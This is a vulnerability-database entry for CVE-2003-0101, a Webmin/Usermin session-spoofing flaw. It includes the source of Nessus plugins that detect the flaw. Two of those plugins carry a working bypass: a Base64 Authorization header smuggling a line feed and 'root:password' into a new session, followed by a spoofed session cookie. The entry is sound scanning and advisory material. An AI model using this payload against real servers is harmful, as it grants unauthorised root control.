Vulnerabilities > CVE-2003-0101

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
engardelinux
usermin
webmin
critical
nessus
exploit available

Summary

miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000 does not properly handle metacharacters such as line feeds and carriage returns (CRLF) in Base-64 encoded strings during Basic authentication, which allows remote attackers to spoof a session ID and gain root privileges.

Exploit-Db

descriptionWebmin 0.9x,Usermin 0.9x/1.0 Session ID Spoofing Unauthenticated Access Vulnerability. CVE-2003-0101. Remote exploit for linux platform
idEDB-ID:22275
last seen2016-02-02
modified2003-02-20
published2003-02-20
reporterCarl Livitt
sourcehttps://www.exploit-db.com/download/22275/
titleWebmin 0.9x,Usermin 0.9x/1.0 - Session ID Spoofing Unauthenticated Access Vulnerability

Nessus

  • NASL familyCGI abuses
    NASL idUSERMIN_SESSION_ID.NASL
    descriptionThe remote server is running a version of Usermin which is vulnerable to Session ID spoofing. An attacker may use this flaw to log in as the
    last seen2020-06-01
    modified2020-06-02
    plugin id11280
    published2003-02-28
    reporterThis script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/11280
    titleUsermin 'miniserv.pl' Base-64 String Metacharacter Handling Session Spoofing
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(11280);
      script_version("1.20");
      script_cvs_date("Date: 2018/08/06 14:03:14");
    
      script_cve_id("CVE-2003-0101");
      script_bugtraq_id(6915);
    
      script_name(english:"Usermin 'miniserv.pl' Base-64 String Metacharacter Handling Session Spoofing");
      script_summary(english:"Spoofs a session ID.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote host has an application that is affected by a Session ID
    spoofing vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The remote server is running a version of Usermin which is vulnerable
    to Session ID spoofing. An attacker may use this flaw to log in as the
    'root' user, and gain full control of the remote host.");
      script_set_attribute(attribute:"solution", value:"Upgrade to Usermin 1.000 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2003/02/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2003/02/20");
      script_set_attribute(attribute:"plugin_publication_date", value:"2003/02/28");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:webmin:usermin");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:usermin:usermin");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
    
      script_dependencie("usermin_detect.nbin");
      script_require_keys("www/usermin");
      script_exclude_keys("global_settings/supplied_logins_only");
      script_require_ports("Services/www", 20000);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    app = "Usermin";
    if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
    
    port = get_http_port(default:20000, embedded:TRUE);
    get_kb_item_or_exit('www/'+port+'/usermin');
    
    dir = '/';
    install_url = build_url(port:port, qs:dir);
    
    init_cookiejar();
    set_http_cookie(name:"testing", value:"1");
    
    r = http_send_recv3(
      method : "GET",
      item   : dir,
      port   : port,
      add_headers : make_array("User-Agent", "webmin", "Authorization","Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgcm9vdDpwYXNzd29yZA=="),
      exit_on_fail : TRUE
    );
    req1 = http_last_sent_request();
    
    if (
      (ereg(pattern:"^HTTP/[0-9]\.[0-9] 401 ", string:r[0])) ||
      (!egrep(pattern:".*session_login\.cgi\?logout=1.*", string:r[2]))
    )
    {
      set_http_cookie(name:"testing", value:"1");
      set_http_cookie(name:"usid", value:"1234567890");
      set_http_cookie(name:"user", value:"x");
      r = http_send_recv3(method: "GET", item:dir, port:port, exit_on_fail:TRUE);
    
      #
      # I'm afraid of localizations, so I grep on the HTML source code,
      # not the message status.
      #
      if (egrep(pattern:".*session_login\.cgi\?logout=1.*", string:r[2]))
      {
        if (report_verbosity > 0)
        {
          report =
            '\n' + 'Nessus was able to exploit this issue with the following pair of' +
            '\n' + 'requests : '+
            '\n' + 
            '\n' + req1 + 
            '\n' + 
            '\n' + http_last_sent_request() + 
            '\n';
          security_hole(port:port, extra:report);
        }
        else security_hole(port);
        exit(0);
      }
    }
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
    
  • NASL familyMandriva Local Security Checks
    NASL idMANDRAKE_MDKSA-2003-025.NASL
    descriptionA vulnerability was discovered in webmin by Cintia M. Imanishi, in the miniserv.pl program, which is the core server of webmin. This vulnerability allows an attacker to spoof a session ID by including special metacharacters in the BASE64 encoding string used during the authentication process. This could allow an attacker to gain full administrative access to webmin. MandrakeSoft encourages all users to upgrade immediately.
    last seen2020-06-01
    modified2020-06-02
    plugin id14009
    published2004-07-31
    reporterThis script is Copyright (C) 2004-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/14009
    titleMandrake Linux Security Advisory : webmin (MDKSA-2003:025)
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Mandrake Linux Security Advisory MDKSA-2003:025. 
    # The text itself is copyright (C) Mandriva S.A.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(14009);
      script_version ("1.18");
      script_cvs_date("Date: 2019/08/02 13:32:46");
    
      script_cve_id("CVE-2003-0101");
      script_xref(name:"MDKSA", value:"2003:025");
    
      script_name(english:"Mandrake Linux Security Advisory : webmin (MDKSA-2003:025)");
      script_summary(english:"Checks rpm output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Mandrake Linux host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "A vulnerability was discovered in webmin by Cintia M. Imanishi, in the
    miniserv.pl program, which is the core server of webmin. This
    vulnerability allows an attacker to spoof a session ID by including
    special metacharacters in the BASE64 encoding string used during the
    authentication process. This could allow an attacker to gain full
    administrative access to webmin.
    
    MandrakeSoft encourages all users to upgrade immediately."
      );
      # http://marc.theaimsgroup.com/?l=webmin-announce&m=104587858408101&w=2
      script_set_attribute(
        attribute:"see_also",
        value:"https://marc.info/?l=webmin-announce&m=104587858408101&w=2"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected webmin package."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:webmin");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:7.2");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:8.0");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:8.1");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:8.2");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:9.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2003/02/26");
      script_set_attribute(attribute:"plugin_publication_date", value:"2004/07/31");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
      script_family(english:"Mandriva Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
    if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);
    
    
    flag = 0;
    if (rpm_check(release:"MDK7.2", reference:"webmin-0.970-2.1mdk", yank:"mdk")) flag++;
    
    if (rpm_check(release:"MDK8.0", reference:"webmin-0.970-2.2mdk", yank:"mdk")) flag++;
    
    if (rpm_check(release:"MDK8.1", reference:"webmin-0.970-2.3mdk", yank:"mdk")) flag++;
    
    if (rpm_check(release:"MDK8.2", reference:"webmin-0.970-2.3mdk", yank:"mdk")) flag++;
    
    if (rpm_check(release:"MDK9.0", reference:"webmin-0.990-6.1mdk", yank:"mdk")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyCGI abuses
    NASL idWEBMIN_SESSION_ID.NASL
    descriptionThe remote server is running a version of Webmin that is vulnerable to a Session ID spoofing attack. An attacker could use this flaw to log in as admin on this host, and gain full control of the system.
    last seen2020-06-01
    modified2020-06-02
    plugin id11279
    published2003-02-28
    reporterThis script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/11279
    titleWebmin 'miniserv.pl' Base-64 String Metacharacter Handling Session Spoofing
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(11279);
      script_version("1.25");
      script_cvs_date("Date: 2018/11/15 20:50:19");
    
      script_cve_id("CVE-2003-0101");
      script_bugtraq_id(6915);
    
      script_name(english:"Webmin 'miniserv.pl' Base-64 String Metacharacter Handling Session Spoofing");
      script_summary(english:"Spoofs a session ID.");
    
      script_set_attribute(attribute:"synopsis", value:"The remote service is vulnerable to a session spoofing attack.");
      script_set_attribute(attribute:"description", value:
    "The remote server is running a version of Webmin that is vulnerable to
    a Session ID spoofing attack. An attacker could use this flaw to log
    in as admin on this host, and gain full control of the system.");
      script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=webmin-announce&m=104587858408101&w=2");
      script_set_attribute(attribute:"solution", value:"Upgrade to version 1.070 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2003/02/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2003/02/20");
      script_set_attribute(attribute:"plugin_publication_date", value:"2003/02/28");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:webmin:webmin");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
    
      script_dependencie("webmin.nasl");
      script_exclude_keys("global_settings/supplied_logins_only");
      script_require_keys("www/webmin");
      script_require_ports("Services/www", 10000);
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    app = 'Webmin';
    port = get_http_port(default:10000, embedded: TRUE);
    get_kb_item_or_exit('www/'+port+'/webmin');
    
    if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
    
    dir = "/";
    install_url = build_url(port:port, qs:dir);
    
    set_http_cookie(name:"testing", value:"1");
    r = http_send_recv3(
      method : "GET",
      item   : dir,
      port   : port,
      add_headers : make_array( "User-Agent", "webmin",  "Authorization", "Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ="),
      exit_on_fail:TRUE
    );
    req1 = http_last_sent_request();
    
    if (
      (egrep(pattern:"^HTTP/[0-9]\.[0-9] 401 ", string:r[0])) &&
      (!egrep(pattern:".*Webmin.*feedback_form\.cgi.*", string: r[2]))
    )
    {
      set_http_cookie(name:"testing", value:"1");
      set_http_cookie(name:"sid", value:"1234567890");
      r = http_send_recv3(method:"GET", item:dir, port:port, exit_on_fail:TRUE);
    
      #
      # I'm afraid of localizations, so I grep on the HTML source code,
      # not the message status.
      #
      if(egrep(pattern:".*Webmin.*feedback_form\.cgi.*", string:r[2]))
      {
        if (report_verbosity > 0)
        {
          report =
            '\n' + 'Nessus was able to exploit this issue with the following pair of' +
            '\n' + 'requests : '+
            '\n' +
            '\n' + req1 + 
            '\n' +
            '\n' + http_last_sent_request() + 
            '\n';
          security_hole(port:port, extra:report);
        }
        else security_hole(port);
        exit(0);
      }
    }
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
    
  • NASL familyCGI abuses
    NASL idWEBMIN_1_070.NASL
    descriptionAccording to its self-reported version, the Webmin install hosted on the remote host is earlier than 1.070. It is, therefore, affected by an authentication bypass vulnerability.
    last seen2020-06-01
    modified2020-06-02
    plugin id108544
    published2018-03-22
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/108544
    titleWebmin < 1.070 authentication bypass
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(108544);
      script_version("1.4");
      script_cvs_date("Date: 2019/04/05 23:25:05");
    
      script_cve_id("CVE-2003-0101");
      script_bugtraq_id(6915);
    
      script_name(english:"Webmin < 1.070 authentication bypass");
      script_summary(english:"Checks version of Webmin.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server is affected by an authentication bypass.");
      script_set_attribute(attribute:"description", value:
    "According to its self-reported version, the Webmin install hosted on
    the remote host is earlier than 1.070. It is, therefore, affected by 
    an authentication bypass vulnerability.");
      script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/bid/6915");
      script_set_attribute(attribute:"see_also", value:"http://www.webmin.com/changes.html");
      script_set_attribute(attribute:"solution", value:"Upgrade to Webmin 1.070 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2003/03/03");
      script_set_attribute(attribute:"patch_publication_date", value:"2003/03/03");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/03/22");
    
      script_set_attribute(attribute:"potential_vulnerability", value:"true");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:webmin:webmin");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("webmin.nasl");
      script_require_keys("www/webmin", "Settings/ParanoidReport");
      script_require_ports("Services/www", 10000);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    app = 'Webmin';
    port = get_http_port(default:10000, embedded: TRUE);
    
    get_kb_item_or_exit('www/'+port+'/webmin');
    version = get_kb_item_or_exit('www/webmin/'+port+'/version', exit_code:1);
    source = get_kb_item_or_exit('www/webmin/'+port+'/source', exit_code:1);
    
    if (report_paranoia < 2) audit(AUDIT_PARANOID);
    
    dir = "/";
    install_url = build_url(port:port, qs:dir);
    
    fix = "1.070";
    
    if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)
    {
      report =
        '\n  URL               : ' + install_url +
        '\n  Version Source    : ' + source +
        '\n  Installed version : ' + version +
        '\n  Fixed version     : ' + fix + '\n';
    
      security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-319.NASL
    descriptionminiserv.pl in the webmin package does not properly handle metacharacters, such as line feeds and carriage returns, in Base64-encoded strings used in Basic authentication. This vulnerability allows remote attackers to spoof a session ID, and thereby gain root privileges.
    last seen2020-06-01
    modified2020-06-02
    plugin id15156
    published2004-09-29
    reporterThis script is Copyright (C) 2004-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/15156
    titleDebian DSA-319-1 : webmin - session ID spoofing
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-319. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(15156);
      script_version("1.20");
      script_cvs_date("Date: 2019/08/02 13:32:17");
    
      script_cve_id("CVE-2003-0101");
      script_bugtraq_id(6915);
      script_xref(name:"DSA", value:"319");
    
      script_name(english:"Debian DSA-319-1 : webmin - session ID spoofing");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "miniserv.pl in the webmin package does not properly handle
    metacharacters, such as line feeds and carriage returns, in
    Base64-encoded strings used in Basic authentication. This
    vulnerability allows remote attackers to spoof a session ID, and
    thereby gain root privileges."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.debian.org/security/2003/dsa-319"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "For the stable distribution (woody) this problem has been fixed in
    version 0.94-7woody1.
    
    The old stable distribution (potato) does not contain a webmin
    package.
    
    We recommend that you update your webmin package."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:webmin");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2003/06/12");
      script_set_attribute(attribute:"plugin_publication_date", value:"2004/09/29");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"3.0", prefix:"webmin", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-apache", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-bind8", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-burner", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-cluster-software", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-cluster-useradmin", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-core", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-cpan", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-dhcpd", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-exports", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-fetchmail", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-grub", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-heartbeat", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-inetd", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-jabber", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-lpadmin", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-mon", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-mysql", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-nis", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-postfix", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-postgresql", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-ppp", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-qmailadmin", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-quota", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-raid", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-samba", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-sendmail", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-software", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-squid", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-sshd", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-ssl", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-status", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-stunnel", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-wuftpd", reference:"0.94-7woody1")) flag++;
    if (deb_check(release:"3.0", prefix:"webmin-xinetd", reference:"0.94-7woody1")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");